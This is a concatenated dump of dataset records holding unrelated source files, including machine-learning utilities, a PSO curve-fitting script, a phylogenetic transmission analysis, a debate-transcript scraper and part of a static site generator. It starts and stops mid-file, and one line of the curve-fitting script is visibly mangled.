accuracy_score,\n mean_squared_error,\n r2_score,\n)\n\n# Scorers\naccuracy_scorer = make_scorer(accuracy_score)\nneg_mean_squared_error_scorer = make_scorer(mean_squared_error,\n greater_is_better=False)\nr2_scorer = make_scorer(r2_score)\n\n\nSCORERS = dict(\n accuracy=accuracy_scorer,\n neg_mean_squared_error=neg_mean_squared_error_scorer,\n r2=r2_scorer,\n)\n\n\ndef get_scorer(scoring, compute=True):\n \"\"\"Get a scorer from string\n\n Parameters\n ----------\n scoring : str | callable\n scoring method as string. If callable it is returned as is.\n\n Returns\n -------\n scorer : callable\n The scorer.\n \"\"\"\n # This is the same as sklearns, only we use our SCORERS dict,\n # and don't have back-compat code\n if isinstance(scoring, six.string_types):\n try:\n scorer = SCORERS[scoring]\n except KeyError:\n raise ValueError('{} is not a valid scoring value. '\n 'Valid options are {}'.format(scoring,\n sorted(SCORERS)))\n else:\n scorer = scoring\n\n return scorer\n","sub_path":"dask_ml/metrics/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"290682112","text":"import pickle\nfrom constants import Constants\n\nclass Database:\n\n\t@staticmethod\n\tdef get_data():\n\t\tprint(\"Getting Data...\")\n\t\ttrain_x, train_y = Database.get_train_data()\n\t\ttest_x = Database.get_test_data()\n\t\tprint(\"train_x: \" + str(len(train_x)) + \", \" + str(len(train_x[0])) )\n\t\tprint(\"train_y: \" + str(len(train_y)))\n\t\tprint(\"test_x: \" + str(len(test_x)) + \", \" + str(len(test_x[0])) )\n\t\tprint(\"Features: \" + str(Constants.tot_features))\n\t\tprint(\"Labels: \" + str(Constants.tot_labels))\n\t\treturn train_x, train_y, test_x\n\n\t# Returns all the row values of a particular column of train_x i.e values of a particular feature, of all data points\n\t@staticmethod\n\tdef get_feature_data(train_x, col):\n\t\tfeature_data = []\n\t\trow = 0\n\t\twhile(row < len(train_x)):\n\t\t\tfeature_data.append(train_x[row][col])\n\t\t\trow = row+1\n\t\treturn feature_data\n\n\t# data: 1d array, containing the values of a particular feature, of all data points\n\t# It returns a 2d grid, where each row represents, all features belonging to a class label;\n\t# rows are sorted in the ascending order of class labels.\n\t@staticmethod\n\tdef partition_by_class_label(data, train_y):\n\t\tlabel_sorted_2d_array = []\n\t\tcount = 1\n\t\twhile(count <= Constants.tot_labels):\n\t\t\tlabel_sorted_2d_array.append([])\n\t\t\tcount = count+1\n\t\tind = 0\n\t\twhile(ind < len(data)):\n\t\t\tdatum = data[ind]\n\t\t\tlabel = train_y[ind]\n\t\t\tlabel_sorted_2d_array[label].append(datum)\n\t\t\tind = ind+1\n\t\treturn label_sorted_2d_array\n\n\t# It returns a 2D array, where, each row represents, all samples belonging to a class label;\n\t# rows are sorted in the ascending order of class labels.\n\t@staticmethod\n\tdef partition_by_class_label_2d(train_x, train_y):\n\t\tlabel_sorted_2d_array = []\n\t\tcount = 1\n\t\twhile(count <= Constants.tot_labels):\n\t\t\tlabel_sorted_2d_array.append([])\n\t\t\tcount = count+1\n\t\tind = 0\n\t\twhile(ind < len(train_x)):\n\t\t\tfeatures = train_x[ind]\n\t\t\tlabel = train_y[ind]\n\t\t\tlabel_sorted_2d_array[label].append(features)\n\t\t\tind = ind+1\n\t\treturn label_sorted_2d_array\n\n\t@staticmethod\n\tdef get_test_data():\n\t\t# Assumption: Should have label-mapping-file in dataset folder\n\t\ttest_filename = Constants.dataset_base + Constants.test_file\n\t\ttest_file = open(test_filename, \"r\")\n\t\ttest_x = []\n\t\tfor sample in test_file:\n\t\t\tfeature_array = sample.split(Constants.data_separator)\n\t\t\tfeature_array = Database.remove_newline(feature_array)\n\t\t\tfeature_array = Database.get_float_list(feature_array)\n\t\t\ttest_x.append(feature_array)\n\t\ttest_file.close()\n\t\treturn test_x\n\n\t@staticmethod\n\tdef get_train_data():\n\t\ttrain_filename = Constants.dataset_base + Constants.train_file\n\t\ttrain_file = open(train_filename, \"r\")\n\t\ttrain_x = []\n\t\ttrain_y = []\n\t\tlabel_dict = dict()\n\t\tfirst_iter = True\n\t\t# Get Train Data\n\t\tfor sample in train_file:\n\t\t\tfeature_array = sample.split(Constants.data_separator)\n\t\t\t# Note the total no. of features\n\t\t\tif(first_iter == True):\n\t\t\t\tfirst_iter = False\n\t\t\t\tConstants.tot_features = len(feature_array)-1\n\t\t\tlast_ind = len(feature_array)-1\n\t\t\tfeature_array = Database.remove_newline(feature_array)\n\t\t\tfeature_part = feature_array[:last_ind]\n\t\t\tlabel_part = feature_array[last_ind]\n\t\t\t# Convert all string-features to floats\n\t\t\tfeature_part = Database.get_float_list(feature_part)\n\t\t\t# Map string-labels to ints\n\t\t\tif(label_dict.get(label_part) == None):\n\t\t\t\tlabel_dict[label_part] = len(label_dict)\n\t\t\tlabel_part = label_dict[label_part]\n\t\t\ttrain_x.append(feature_part)\n\t\t\ttrain_y.append(label_part)\n\t\tlabel_mapping_filename = Constants.dataset_base + Constants.label_mapping_file\n\t\t# Save the Label Mapping\n\t\tDatabase.dump_data(label_mapping_filename, label_dict)\n\t\tDatabase.label_dict = label_dict\n\t\tConstants.tot_labels = len(label_dict)\n\t\ttrain_file.close()\n\t\treturn train_x, train_y\n\n\t@staticmethod\n\tdef dump_data(filename, data):\n\t\tfile = open(filename, \"wb\")\n\t\tpickle.dump(data, file)\n\t\tfile.close()\n\n\t@staticmethod \n\tdef load_data(filename):\n\t\tfile = open(filename, \"rb\")\n\t\tdata = pickle.load(file)\n\t\tfile.close()\n\t\treturn data\n\n\t@staticmethod\n\tdef remove_newline(feature_array):\n\t\tlast_ind = len(feature_array)-1\n\t\tlast_feature_len = len(feature_array[last_ind])\n\t\t# Remove the newline character, if present\n\t\tif(feature_array[last_ind][last_feature_len-1] == \"\\n\"):\n\t\t\tfeature_array[last_ind] = feature_array[last_ind][:last_feature_len-1]\n\t\treturn feature_array\n\n\t@staticmethod\n\tdef get_float_list(lst):\n\t\tind = 0\n\t\twhile(ind < len(lst)):\n\t\t\tlst[ind] = float(lst[ind])\n\t\t\tind = ind+1\n\t\treturn lst\n\n\t# Gives str(label) given int(label)\n\t@staticmethod\n\tdef decode_label(tar_label_int):\n\t\tfor label_str, label_int in Database.label_dict.items():\n\t\t\tif(label_int == tar_label_int):\n\t\t\t\treturn label_str","sub_path":"ass_3/src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"635409436","text":"#\n# Problem: Write a function that finds the index of a rotation point in a \"mostly\" ordered list.\n#\nfrom typing import List\n\n\ndef find_rotation_point(items: List) -> int:\n\t\"\"\"\n\tSolution:\n\tComplexity:\n\t\tTime: O(lg(n)) - Binary search-like algorithm\n\t\tSpace: O(1) - Constant space, just tracking a few ints\n\t\"\"\"\n\tif not items:\n\t\traise ValueError('items must contain at least one value')\n\n\tindex_start = 0\n\tindex_end = len(items) - 1\n\n\t# Covers scenarios where one item is in the list\n\t# or where the first item is the rotation point\n\tif items[index_start] <= items[index_end]:\n\t\treturn 0\n\n\twhile index_start != index_end:\n\t\t# If we've zeroed in on adjacent items, then we know the second is the rotation point\n\t\tif index_start + 1 == index_end:\n\t\t\treturn index_end\n\n\t\tindex_search = int((index_start + index_end) / 2)\n\t\tif items[index_search] < items[0]:\n\t\t\tindex_end = index_search\n\t\telse:\n\t\t\tindex_start = index_search\n\n\treturn index_start\n","sub_path":"problems/ic_find_rotation_point.py","file_name":"ic_find_rotation_point.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"597589144","text":"import numpy as np\r\nfrom decimal import Decimal\r\nfrom pyswarm import pso\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport csv\r\nimport sys\r\n\r\nprint('CPCR Curve fitting')\r\nprint(' the function is a+b*x+c/((1+math.exp(-d*(x-e)))*(1+math.exp(-f*(x-g))))')\r\nprint(' the program use pso to optimze the parameter of fuction above')\r\n# caculate mean of the data of experiment \r\ndef caculatemean(arg,size):\r\n sum=0.0\r\n for i in xrange(size):\r\n sum=sum+arg[i]\r\n return sum/size\r\n#caculate the predict data using function \r\ndef caculate(x,parameters):\r\n a,b,c,d,e,f,g=parameters\r\n return a+b*x+c/((1+math.exp(-d*(x-e)))*(1+math.exp(-f*(x-g))))\r\n# score function R-score=-1+SSE/SST\r\ndef myfunction(parameters,*args):\r\n a,b,c,d,e,f,g=parameters\r\n y=args\r\n SSE=0.0\r\n size=len(y)\r\n parametersSize=len(parameters)\r\n for i in xrange(size):\r\n yi=caculate(i+1,parameters)\r\n SSE=SSE+math.pow((y[i]-yi),2)\r\n meanvalue=caculatemean(args,size)\r\n SST=0.0\r\n for i in xrange(size):\r\n SST=SST+math.pow((y[i]-meanvalue),2)\r\n if SST==0:\r\n print('warning the SST maybe be zero')\r\n SS=1-SSE/SST\r\n return (SSE/SST)-1 #R-score\r\n #return (parametersSize/(size-parametersSize-1))*(1-SS)-SS #adjust R-score\r\n #return SSE\r\n# prepare the csv format data of experiment\r\ndef readfile(filename):\r\n rows=[]\r\n with open(filename) as f:\r\n f_csv=csv.reader(f)\r\n headers=next(f_csv)\r\n for row in f_csv:\r\n if row:\r\n rows.append(row)\r\n return np.array(np.transpose(rows),dtype=float)\r\n#caculate average of all number to shutdown the number \r\ndef caculatemidnum(data):\r\n sum=0.0\r\n length=len(data)\r\n for itera in data:\r\n sum=sum+(itera)\r\n return sum/(length*60)\r\n#caculate Maxnum num in every col\r\n'''def caculateMaxNum(data):\r\n max=0\r\n for itera in data:\r\n if itera>max:\r\n max=itera\r\n return max/60.0'''\r\n# produce iterations of pso according to the pcr data infomation\r\ndef constraint(data,length):\r\n sum=200\r\n for itera in xrange(1,length):\r\n if data[itera]0:\r\n file_result=open('result.txt','w')\r\n file_result.write(repr('para_a').rjust(10)+repr('para_b').rjust(10)+repr('para_c').rjust(10)+repr('para_d').rjust(10)+repr('para_e').rjust(10)+repr('para_f').rjust(10)+repr('para_g').rjust(10)+repr('error').rjust(10)+'\\n')\r\n for rownum in xrange(row):\r\n '''print data[rownum].min()\r\n print data[rownum].max()\r\n print data[rownum].mean()'''\r\n args=data[rownum]\r\n length=len(args)\r\n iteration=constraint(args,length)\r\n print('iterations={}'.format(iteration))\r\n print(\"please wait a moment....\")\r\n minNum=args.min()\r\n maxNum=args.max()\r\n meanNum=args.mean()\r\n lb=[-maxNum,0,-meanNum,-1,-maxNum,-1,-maxNum]\r\n ub=[1,0.5,maxNum,1.1,maxNum+meanNum,1.1,maxNum+meanNum]\r\n initialData=[0,0.01,meanNum,-1,maxNum,0.7,maxNum]\r\n initialData2=[minNum,0.03,meanNum+4,0.1,maxNum,-1,maxNum] \r\n xopt4,fopt4=pso(myfunction,lb,ub,args=args,initialData=initialData,initialData2=initialData2,swarmsize=250,maxiter=iteration)\r\n print('The optimum is at:')\r\n print(' {}'.format(xopt4))\r\n print('Optimal function values:')\r\n #print(' R-square : {}'.format(fopt4))\r\n print('ajusted R-squared:{}'.format(-fopt4)) \r\n file_result.write(repr(xopt4[0]).rjust(10)+repr(xopt4[1]).rjust(10)+repr(xopt4[2]).rjust(10)+repr(xopt4[3]).rjust(10)+repr(xopt4[4]).rjust(10)+repr(xopt4[5]).rjust(10)+repr(xopt4[6]).rjust(10)+repr(fopt4).rjust(10)+'\\n')\r\n x=np.linspace(1,length,10000)\r\n y=xopt4[0]+xopt4[1]*x+xopt4[2]/((1+np.exp(-xopt4[3]*(x-xopt4[4])))*(1+np.exp(-xopt4[5]*(x-xopt4[6]))))\r\n plt.figure(rownum)\r\n for i in xrange(length):\r\n plt.plot(i+1,args[i],'blue',linestyle='dashed',marker='.')\r\n plt.plot(x,y,'r',linewidth=2)\r\n plt.xlabel(\"circle(Time)\")\r\n plt.ylabel(\"fluorescence\")\r\n plt.legend()\r\n plt.show()\r\n if row>0:\r\n file_result.close()\r\nif __name__==\"__main__\":\r\n main()\r\n\r\n\r\n \r\n","sub_path":"pso_general_new.py","file_name":"pso_general_new.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"479296986","text":"import logging\nimport os\nfrom collections import Counter, defaultdict\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib.pyplot import bar, plot, xlim, xlabel, ylabel, legend, show, ylim, figure, savefig\nfrom pastml.tree import read_tree, DATE, annotate_dates\nfrom pastml.visualisation.cytoscape_manager import save_as_transition_html\n\nDATE_STEP = 10\n\nEXT_COLOR = '#4daf4a'\nHIGH_COLOR = '#e41a1c'\nLOW_COLOR = '#377eb8'\n\nstate2color = {'High': HIGH_COLOR, 'External': EXT_COLOR, 'Low': LOW_COLOR}\n\n\ndef count_transmissions(tree, mp_df, filter=lambda _: True):\n states = mp_df.columns\n from_to2count = Counter()\n for n in tree.traverse():\n if not filter(n):\n continue\n for n_state in states:\n same_state_count = 0\n for c in n.children:\n for c_state in states:\n prob = mp_df.loc[n.name, n_state] * mp_df.loc[c.name, c_state]\n from_to2count[(n_state, c_state)] += prob\n if n_state == c_state:\n same_state_count += prob\n old_v = from_to2count[(n_state, n_state)]\n from_to2count[(n_state, n_state)] -= min(mp_df.loc[n.name, n_state], same_state_count)\n if from_to2count[(n_state, n_state)] < 0:\n print(old_v, from_to2count[(n_state, n_state)], mp_df.loc[n.name, n_state], same_state_count)\n return from_to2count\n\n\nif '__main__' == __name__:\n\n logging.basicConfig(level=logging.INFO, format='%(asctime)s: %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\",\n filename=None)\n import argparse\n\n data_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), '../..', 'data')\n\n parser = argparse.ArgumentParser(description=\"Visualises PastML stats.\")\n\n parser.add_argument('--column', default='highlow_prevalence', required=True,\n type=str, help=\"the column of interest.\")\n parser.add_argument('--trees', default=os.path.join(data_dir, \"rep_*\"),\n type=str, help=\"the PASTML trees.\", nargs='+')\n parser.add_argument('--mps', default=os.path.join(data_dir, \"rep_*\"),\n type=str, help=\"the PASTML marginal probability files.\", nargs='+')\n parser.add_argument('--labels', type=str, help=\"the PASTML tree labels.\", nargs='+')\n parser.add_argument('--table', default=os.path.join(data_dir, \"table.xlsx\"), type=str, required=True,\n help=\"Who infected whom table.\")\n parser.add_argument('--out_html', default=os.path.join(data_dir, \"transitions_{}.html\"), type=str, required=True,\n help=\"Who infected whom visualisation.\")\n\n params = parser.parse_args()\n\n forest = []\n for nwk in params.trees:\n tree = read_tree(nwk, columns=[params.column])\n annotate_dates([tree])\n forest.append(tree)\n\n # Who infected whom\n with pd.ExcelWriter(params.table, engine='xlsxwriter') as writer:\n workbook = writer.book\n for label, tree, mp in zip(params.labels, forest, params.mps):\n mp_df = pd.read_csv(mp, sep='\\t', index_col=0)\n states = mp_df.columns\n\n min_year, max_year = np.inf, -np.inf\n\n year2state_counts = defaultdict(Counter)\n state_counts = Counter()\n for tip in tree:\n year = int(getattr(tip, DATE))\n if min_year > year:\n min_year = year\n if max_year < year:\n max_year = year\n year //= DATE_STEP\n for state in states:\n mp = mp_df.loc[tip.name, state]\n state_counts[state] += mp\n year2state_counts[year][state] += mp\n\n state_df = pd.DataFrame(index=states, columns=['samples'], data=[[state_counts[s]] for s in states])\n total_counts = state_df['samples'].sum()\n state_df['%'] = 100 * state_df['samples'] / total_counts\n state_df.to_excel(writer, sheet_name='{} tip states'.format(label), startrow=0, startcol=0, float_format='%.0f')\n\n transmission2counts = count_transmissions(tree, mp_df)\n\n df = pd.DataFrame(columns=states, index=states)\n\n for (from_state, to_state), count in transmission2counts.items():\n df.loc[from_state, to_state] = count\n\n total_transitions = df.sum().sum()\n for s in states:\n percentage_s = '% of {}'.format(s)\n df[percentage_s] = 0\n df.loc[percentage_s, percentage_s] = 0\n for state in states:\n df['% of {}'.format(state)] = 100 * df.loc[states, state] / df.loc[states, state].sum(skipna=True)\n df.loc['% of {}'.format(state), states] \\\n = 100 * df.loc[state, states] / df.loc[state, states].sum(skipna=True)\n df.loc[['% of {}'.format(s) for s in states], '% of {}'.format(state)] \\\n = (100 * df.loc[states, state] / total_transitions).tolist()\n\n print(df)\n\n df.to_excel(writer, sheet_name='{} transmissions'.format(label), startrow=0, startcol=0,\n index_label='From \\\\ To', float_format='%.0f')\n\n counts = np.round(np.array(state_df['%'], dtype=float), 1)\n transitions = np.round(\n np.array(df.loc[['% of {}'.format(s) for s in states], ['% of {}'.format(s) for s in states]],\n dtype=float), 0)\n save_as_transition_html(params.column, states, counts=counts,\n transitions=transitions,\n out_html=params.out_html.format(label, min_year, max_year),\n state2colour=state2color, work_dir=None,\n local_css_js=False, threshold=0)\n\n # year2count_array = {}\n # year2transmission_array = {}\n n = len(states)\n years = sorted(set((int(getattr(n, DATE))) // DATE_STEP for n in tree.traverse()))\n n_years = len(years)\n count_array = np.zeros(n * n_years, dtype=float)\n transmission_array = np.zeros((n * n_years, n * n_years), dtype=float)\n state_labels = []\n for year_i, year in enumerate(years):\n for s in states:\n suffixed_s = '{}, {}s'.format(s, year * DATE_STEP)\n state_labels.append(suffixed_s)\n state2color[suffixed_s] = state2color[s]\n\n state_counts = year2state_counts[year]\n # total_counts = sum(state_counts.values())\n count_array[year_i * n: (year_i + 1) * n] = [state_counts[s] for s in states]\n # year2count_array[year] = np.array([state_counts[s] for s in states], dtype=float)\n\n y_transmission2counts = count_transmissions(tree, mp_df,\n filter=lambda n: year == (int(getattr(n, DATE))) // DATE_STEP)\n a = np.zeros((n, n), dtype=float)\n for i in range(n):\n i_state = states[i]\n a[i, i] = y_transmission2counts[(i_state, i_state)]\n for j in range(0, i):\n j_state = states[j]\n a[i, j] = y_transmission2counts[(i_state, j_state)]\n a[j, i] = y_transmission2counts[(j_state, i_state)]\n # total_transitions = a.sum()\n transmission_array[year_i * n: (year_i + 1) * n, year_i * n: (year_i + 1) * n] = a\n # year2transmission_array[year] = a\n\n count_array = 100 * count_array / total_counts\n transmission_array = 100. * transmission_array / total_transitions\n\n counts = np.round(count_array, 1)\n transitions = np.round(transmission_array, 0)\n if np.any(transitions > 0):\n save_as_transition_html(params.column, state_labels, counts=counts,\n transitions=transitions,\n out_html=params.out_html.format(label, 'by', DATE_STEP),\n state2colour=state2color, work_dir=None,\n local_css_js=False, threshold=0)\n\n logging.info('Analysed who infected whom in {}'.format(label))","sub_path":"snakemake/py/vis_transmissions.py","file_name":"vis_transmissions.py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"230008709","text":"import numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom pandas import ExcelWriter\r\nimport xlrd\r\nfrom scipy.cluster.hierarchy import fcluster\r\nfrom scipy.cluster.hierarchy import linkage\r\nfrom scipy.cluster.hierarchy import dendrogram\r\n \r\nsns.set(style=\"white\")\r\nplt.rcParams[\"font.family\"] = 'HYSinMyeongJo-Medium'\r\nplt.rcParams[\"font.size\"] = 12\r\n\r\ndef fancy_dendrogram(*args, **kwargs):\r\n max_d = kwargs.pop('max_d', None)\r\n if max_d and 'color_threshold' not in kwargs:\r\n kwargs['color_threshold'] = max_d\r\n annotate_above = kwargs.pop('annotate_above', 0)\r\n\r\n ddata = dendrogram(*args, **kwargs)\r\n\r\n if not kwargs.get('no_plot', False):\r\n plt.title('Hierarchical Clustering Dendrogram (truncated)')\r\n plt.ylabel('distance')\r\n for i, d, c in zip(ddata['icoord'], ddata['dcoord'], ddata['color_list']):\r\n x = 0.5 * sum(i[1:3])\r\n y = d[1]\r\n if y > annotate_above:\r\n plt.plot(x, y, 'o', c=c)\r\n plt.annotate(\"%.3g\" % y, (x, y), xytext=(0, -5),\r\n textcoords='offset points',\r\n va='top', ha='center')\r\n if max_d:\r\n plt.axhline(y=max_d, c='k')\r\n return ddata\r\n\r\ndef clustering():\r\n predict = pd.DataFrame(fcluster(row_clusters,1.5,criterion='distance'),data.index)\r\n predict.columns=['predict']\r\n cluster=predict['predict'].values.tolist()\r\n n_cluster=max(cluster)\r\n \r\n for i in range(n_cluster):\r\n print('Cluster %i: %s' % ((i+1), ','.join(predict.index[predict['predict']==i+1].tolist())))\r\n\t\r\n return predict\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n data = 1-abs(round(pd.read_excel('C:/Users/user/Desktop/150x150.xlsx'),4))\r\n labels = data.index\r\n row_clusters = linkage(data, method='complete')\r\n row_clusters = pd.DataFrame(row_clusters,columns=['클러스터ID_1','클러스터ID_2', '거리', '클러스터 멤버수'],index=['클러스터 %d' %(i+1) for i in range(row_clusters.shape[0])])\r\n fancy_dendrogram(row_clusters, labels = labels, max_d=1.5)\r\n clustering()\r\n plt.tight_layout()\r\n plt.ylabel('height')\r\n plt.show()\r\n","sub_path":"code/cluster_ver2.py","file_name":"cluster_ver2.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"524037827","text":"import wx\nfrom Colours import Colours\n\n\nclass DialogBox(wx.TextCtrl):\n \"\"\"\n This class represents the dialog box of the gui.\n \"\"\"\n\n def __init__(self, parent):\n\n wx.TextCtrl.__init__(self, parent=parent, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.VSCROLL)\n\n self.SetBackgroundColour(Colours.dialog_box)\n\n sizer = wx.BoxSizer()\n\n sizer.Add(self, 1, wx.ALIGN_BOTTOM | wx.RIGHT | wx.LEFT)\n\n parent.SetSizer(sizer)\n\n self.font = wx.Font(20, wx.DEFAULT, wx.NORMAL, wx.BOLD)\n\n self.SetFont(self.font)\n\n self.SetForegroundColour(wx.RED)\n\n def update_text(self, message):\n\n content_relevant = self.content_relevant(message)\n\n if content_relevant:\n\n self.SetValue(message)\n\n def content_relevant(self, message):\n \"\"\"\n The function checks if the received content is relevant.\n \"\"\"\n\n if message == \"The server has finished executing your request. If you are convinced that your request\" + \\\n \" was not completed, talk to your manager.\" and \"There are only: \" in self.GetValue() \\\n and \"executors that can execute your current request.\" in self.GetValue():\n\n return False\n\n return True","sub_path":"Project/Code/Client/client1/DialogBox.py","file_name":"DialogBox.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"73350563","text":"def displayr(no):\r\n if no !=0: #recursive call\r\n print(\"\",no)\r\n no= no -1\r\n displayr(no)\r\n\r\ndef main():\r\n print(\"Enter the number of times you want to print *\")\r\n value = int(input())\r\n displayr(value)\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"assignment5/assignment5_3.py","file_name":"assignment5_3.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"498291948","text":"import csv\r\n\r\ndef balance():\r\n with open(\"Finances.csv\") as r:\r\n sheetReader = csv.reader(r)\r\n loops = 0\r\n for row in sheetReader:\r\n # Empty lines are boring, who needs 'em\r\n if row == []:\r\n continue\r\n # Gets overwritten each loop, so it saves the last value\r\n lastrow = row\r\n loops += 1\r\n if loops <= 1:\r\n # If there are only 1-2 rows, the sheet is empty.\r\n print(\"Please input a starting balance first.\")\r\n return\r\n # Data corruption isn't fun\r\n r.close()\r\n\r\n print('''\r\n Savings Balance: {}\r\n checking Balance: {}\r\n Cash Balance: {}\r\n\r\n Total Balance: {}\r\n '''.format(lastrow[5], lastrow[6], lastrow[7], lastrow[8]))\r\n","sub_path":"commands/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"411343383","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\n# Download transcripts of the GOP debates from the 2016 election\n\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ntranscript_directory = 'markov_transcripts'\n\n\ndef _get_debate_dataframe(url='http://www.presidency.ucsb.edu/debates.php'):\n # Get the table of all presidential debates from\n # http://www.presidency.ucsb.edu\n \n # Scrape the HTML\n session = requests.Session()\n html = session.get(url)\n soup = bs(html.text, 'lxml')\n \n \n # Find the table-data cells with debate information\n docdate = soup.find_all('td', attrs={'class':'docdate'})\n doctext = soup.find_all('td', attrs={'class':'doctext'})\n\n \n # Clean and put the cells into a dataframe\n dates = map(lambda x: x.get_text().strip(), docdate)\n dates = filter(lambda x: x != '', dates)\n\n titles = map(lambda x: re.sub(r\"\"\"\\s+\"\"\", ' ', x.get_text()).strip(), doctext)\n\n urls = map(lambda x: x.find('a', href=True)['href'] \n if hasattr(x.find('a', href=True), '__getitem__') else '', \n doctext)\n\n debate_data = pd.DataFrame({'date': dates, \n 'title': titles, \n 'url': urls})\n \n \n # Clean up dataframe formatting and columns\n debate_data['date'] = pd.to_datetime(debate_data.date)\n debate_data['year'] = debate_data.date.apply(lambda x: x.year)\n\n debate_data['primary'] = ( debate_data\n .title\n .str\n .extract(r\"\"\"(Democratic|Republican)\"\"\", expand=False)\n .fillna('')\n )\n \n return debate_data\n\n\n\ndef _get_gop_primaries(debate_data):\n # Extract just this election's GOP primary data, remove undercard debates\n \n mask = ( (debate_data.year > 2012) & \n (debate_data.primary == 'Republican') &\n (debate_data.title.str.contains('Undercard').pipe(np.invert))\n )\n\n gop_primary_data = debate_data.loc[mask]\n \n return gop_primary_data\n\n\n\ndef _get_debate_text(url):\n # Get transcript of a debate based on url\n \n # Scrape the HTML\n session = requests.Session()\n html = session.get(url)\n soup = bs(html.text, 'lxml')\n\n # The debate text is in a span of class displaytext\n debate_text = soup.find('span', attrs={'class':'displaytext'}).text.encode('utf-8').strip()\n \n return debate_text\n\n\n\ndef _write_transcript_to_file(filename, text, directory=transcript_directory):\n # Write the text of a debate transcript to a file\n \n if not os.path.exists(directory):\n os.mkdir(directory)\n \n # Save a string to a file\n \n filepath = '{}/{}'.format(directory,filename)\n with open(filepath, 'w') as fh:\n fh.write(text)\n \n return\n\n\n\ndef download_debate_data():\n # Wrapper function to determine urls for debate transcripts and download all to a file\n\n print('Scraping data...')\n\n # Get the dataframe of GOP debates from this year\n debate_data = _get_debate_dataframe()\n gop_primary_data = _get_gop_primaries(debate_data)\n\n\n # Create a filename to save the transcript text to\n gop_primary_data['filename'] = gop_primary_data.date.dt.strftime('%Y_%m_%d') + '_gop_debate.txt'\n\n\n # Scrape the corresponding URL for the transcript\n gop_primary_data['transcript'] = gop_primary_data.url.apply(lambda x: _get_debate_text(x))\n\n print('Writing data...')\n\n # Write the transcripts to files\n _ = gop_primary_data.apply(lambda x: _write_transcript_to_file(x.filename, x.transcript), axis=1)\n\n print('...Done.')\n\n return\n\n","sub_path":"python/markov_text_download.py","file_name":"markov_text_download.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"244644995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom collections import OrderedDict\nfrom datetime import datetime, time\nfrom dateutil.tz import tzlocal\nfrom slugify import slugify\nfrom xml.etree import ElementTree\n\nfrom .filters import *\nfrom .transforms import *\n\nimport codecs\nimport dateutil.parser\nimport os\nimport re\nimport yaml\n\n\nclass Recipe(object):\n\n \"\"\"A series of steps to filter/transform content for a resource.\n \"\"\"\n\n def __init__(self, steps):\n self.steps = steps\n\n def prepare(self, content, resource):\n return reduce(\n lambda content, step: step(content, resource),\n self.steps,\n content\n )\n\n\nclass Resource(object):\n\n \"\"\"An asset involved in the creation of a website.\n \"\"\"\n\n def __init__(self, **meta):\n self.__dict__.update(meta)\n\n def meta(self, **meta):\n if meta:\n self.__dict__.update(meta)\n else:\n return self.__dict__.copy()\n\n\nclass Site(object):\n\n \"\"\"A static website under construction.\n \"\"\"\n\n defaults = {\n\n 'base': '',\n 'draft_suffix': '.draft',\n\n 'filters': {\n '\\.md$': [\n yaml_headers(defaults={\n 'suffix': '.html',\n 'template': 'default.html',\n }),\n ],\n },\n\n 'sitemap': 'sitemap.xml',\n 'source': '.',\n 'target': '.',\n 'templates': os.path.join(os.path.dirname(__file__), 'template'),\n\n 'transforms': {\n '\\.md$': [\n markdown(extensions=['codehilite(guess_lang=False)']),\n jinja2(),\n #minify(),\n ],\n },\n\n }\n\n def __init__(self, **config):\n self.__dict__.update(config)\n self.__resources = {}\n\n @classmethod\n def configure(this, path):\n\n \"\"\"Load website configuration from YAML file with reasonable defaults.\n \"\"\"\n\n def _config(path):\n\n config = yaml.load(Site.readTextFile(path))\n\n return config if isinstance(config, dict) else {}\n\n config = this.defaults.copy()\n\n if os.path.isdir(path):\n\n _path = os.path.join(path, 'site.yaml')\n\n if os.path.isfile(_path):\n config.update(_config(_path))\n\n elif os.path.isfile(path):\n\n config.update(_config(path))\n path = os.path.dirname(path)\n\n for key in ['source', 'target', 'templates']:\n config[key] = os.path.normpath(os.path.join(path, config[key]))\n\n return this(**config)\n\n def index(self, resource):\n\n \"\"\"List of resources related to the specified resource.\n \"\"\"\n\n if hasattr(resource, 'index'):\n # TODO filter criteria, sort order\n return OrderedDict(sorted(self.__resources.items()))\n\n @classmethod\n def readTextFile(this, name):\n\n \"\"\"Read content from UTF-8 text file, line-ending agnostic.\n \"\"\"\n\n with codecs.open(name, 'U', encoding='utf-8') as stream:\n return 